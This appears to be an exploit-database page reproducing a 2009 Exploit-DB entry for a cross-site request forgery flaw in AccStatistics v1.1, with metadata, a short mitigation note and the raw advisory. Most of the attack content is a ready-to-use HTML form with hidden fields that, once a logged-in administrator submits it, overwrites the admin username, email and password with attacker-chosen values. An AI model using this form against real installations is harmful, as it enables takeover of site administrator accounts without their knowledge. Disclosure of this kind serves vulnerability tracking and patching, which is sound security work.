AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings) exploit

vendor:

AccStatistics

by:

Milos Zivanovic

8.8

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: AccStatistics

Affected Version From: v1.1

Affected Version To: v1.1

Patch Exists: NO

Related CWE: N/A

CPE: accstatistics

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings) exploit

This exploit allows an attacker to change the username, email, and password of the admin account of AccStatistics v1.1 by submitting a malicious form with hidden inputs. The form action is set to the AccStatistics index page and the submit button name is set to 'preview'.

Mitigation:

Implement a server-side check to verify that the request is coming from the same origin. Additionally, use a random token in the form to prevent CSRF attacks.

Source

Exploit-DB raw data:

[-------------------------------------------------------------------------------------------------]
[   Title: AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings)                          ]
[   Author: Milos Zivanovic                                                                       ]
[   Date: 13. December 2009.                                                                      ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: AccStatistics                                                                    ]
[   Version: v1.1                                                                                 ]
[   Download: http://www.accstatistics.com/download/accstatistics.zip                             ]
[   Vulnerability: Cross Site Request Forgery                                                     ]
[-------------------------------------------------------------------------------------------------]

I've tested this on demo version where name attribute of submit button is 'preview'. I doubt that's
the name in the real thing. I don't know what is the name tag of it but it's usually 'submit' or
'save' (could be something other).

With this exploit we can change allot of stuff, but some of the most critical would be:
username, email, password...

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/accstatistics/demo/index.php" method="POST">
  <input type="hidden" name="p" value="edit1">
  <input type="hidden" name="id" value="1">
  <input type="hidden" id="input_username" name="input_username" value="admin">
  <input type="hidden" id="input_email" name="input_email" value="my@email.com">
  <input type="password" id="input_password" name="input_password" value="hacked">
  <input type="password" id="input_password1" name="input_password1" value="hacked">
  <input type="hidden" id="input_sitename" name="input_sitename" value="AccStatistics">
  <input type="hidden" id="input_ignoredomains" name="input_ignoredomains" value="">
  <input type="hidden" id="input_ignoremyvisits" name="input_ignoremyvisits" value="1">
  <input type="hidden" id="input_ignoresubdomenins" name="input_ignoresubdomenins" value="1">
  <input type="hidden" id="input_rowsperpage" name="input_rowsperpage" value="30">
  <input type="checkbox" id="input_reset" name="input_reset" value="1">
  <input type="submit" name="preview" value="Save">
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[----------------------------------------------EOF------------------------------------------------]